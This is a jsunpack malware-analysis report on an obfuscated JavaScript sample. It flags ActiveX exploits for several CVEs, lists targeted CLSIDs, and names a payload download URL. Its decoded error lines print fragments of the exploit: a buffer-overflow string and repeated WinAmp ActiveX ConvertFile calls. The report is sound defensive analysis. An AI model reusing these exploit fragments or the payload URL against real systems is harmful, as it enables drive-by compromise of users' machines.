JSUNPACK
A Generic JavaScript Unpacker
CAUTION: jsunpack was designed for security researchers and computer professionals

Submission permanent link 2a44256f5a51752849a4d856aa4355b23bcc8ee5 (Received 2017-11-07 13:04:21, script )

URL    Status
127.0.0.1/undefined

127.0.0.1/about:blank

127.0.0.1/./pdf.php

All Malicious or Suspicious Elements of Submission

malicious: MSOfficeSnapshotViewer CVE-2008-2463 detected F0E42D50-368C-11D0-AD81-00A0C90DC8D9
malicious: COMObjectInstantiationMemoryCorruption CVE-2005-2127 detected EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
malicious: MSDirectShowCLSID CVE-2008-0015 detected 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
malicious: Alert detected /alert CVE-2008-2463 PrintSnapshot
suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 130770
www.ut885.com/pics/load.php?e=1 benign
[nothing detected] (var newurl) www.ut885.com/pics/load.php?e=1
     status: (referer=http:/www.ask.com/web?q=puppies)saved 330 bytes 48bf15d8359dc7d712627fc8431f13dfc1133404
     info: [0] no JavaScript
     file: 48bf15d8359dc7d712627fc8431f13dfc1133404: 330 bytes

Decoded Files
48bf/15d8359dc7d712627fc8431f13dfc1133404 from www.ut885.com/pics/load.php?e=1 (330 bytes)


script malicious
[malicious:10] script
     info: [decodingLevel=0] found JavaScript
     info: DecodedGenericCLSID detected EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F BA018599-1DB3-44f9-83B4-461454C84BF8 F0E42D50-368C-11D0-AD81-00A0C90DC8D9 7F5B7F63-F06F-4331-8A26-339E03C0AE3D BD96C556-65A3-11D0-983A-00C04FC29E36 D0C07D56-7C69-43F1-B4A0-25F5A11FAB19 0006F03A-0000-0000-C000-000000000046 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF 06723E09-F4C2-43c8-8358-09FCD1DB0766 E8CCCDDF-CA28-496b-B050-6C07C962476B 6e32070a-766d-4ee6-879c-dc1fa91d2fc3 0006F033-0000-0000-C000-000000000046 639F725F-1B2D-4831-A9FD-874847682010 AB9BCEDD-EC7E-47E1-9322-D4A210617116 6414512B-B978-451D-A0D8-FCFDF33E833C
     malicious: MSOfficeSnapshotViewer CVE-2008-2463 detected F0E42D50-368C-11D0-AD81-00A0C90DC8D9
     malicious: COMObjectInstantiationMemoryCorruption CVE-2005-2127 detected EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
     malicious: MSDirectShowCLSID CVE-2008-0015 detected 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
     info: ActiveXDataObjectsMDAC detected MSXML2.ServerXMLHTTP Microsoft.XMLHTTP
     info: [javascript variable] URL=www.ut885.com/pics/load.php?e=1
     info: [decodingLevel=1] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ;');document.write('bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,
          error: line:3: .^
     error: ./pre.js:249: SyntaxError: unterminated string literal:
          error: ./pre.js:249: location.href = "http:/localhost/?finish
          error: ./pre.js:249: ................^
     info: Decoding option navigator.systemLanguage=en and navigator.systemLanguage=zh-cn and browser=IE7/XP and browser=IE8/Vista and browser=Opera and browser=Firefox,      0 bytes
     info: Decoding option navigator.systemLanguage=en and navigator.systemLanguage=zh-cn and browser=IE7/XP and browser=IE8/Vista and browser=Opera,      2922 bytes
     info: Decoding option browser=Firefox,      2877 bytes
     malicious: Alert detected /alert CVE-2008-2463 PrintSnapshot
     suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 130770
     info: DecodedMsg detected /info.ActiveXObject snpvw.Snapshot Viewer Control.1
     info: [setAttribute src] URL=127.0.0.1/./pdf.php
     info: [setAttribute src] URL=127.0.0.1/about:blank
     info: [element] URL=127.0.0.1/undefined
     info: [var urltofile] URL=www.ut885.com/pics/load.php?e=1
     info: [var newurl] URL=www.ut885.com/pics/load.php?e=1
     info: [decodingLevel=2] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ;bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))IWinAmpActiveX.ConvertFile bof,1,1,1,1,1IWinAmpActiveX.ConvertFile bof,1,1,1,1,1IWinAmpActiveX.ConvertFile bof,1,1,1,1,1IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
          error: line:3: ...............................................................^
     error: line:58: SyntaxError: unterminated string literal:
          error: line:58: location.href = "http:/localhost/?finish
          error: line:58: ................^
     info: file: saved script to (6e04d09e19bc0e5a04dc2d0b2716b0d0ff010f94)
     file: 6e04d09e19bc0e5a04dc2d0b2716b0d0ff010f94: 31136 bytes
     file: 577674952c9c28ca199dab26b5a48bafbb27657e: 7420 bytes
     file: e5ed0da410311222c26bbfc2687eafb9c9d8f7e4: 2922 bytes

Decoded Files
6e04/d09e19bc0e5a04dc2d0b2716b0d0ff010f94 from script (31136 bytes, 7 hidden)

5776/74952c9c28ca199dab26b5a48bafbb27657e from script (7420 bytes)

e5ed/0da410311222c26bbfc2687eafb9c9d8f7e4 from script (2922 bytes)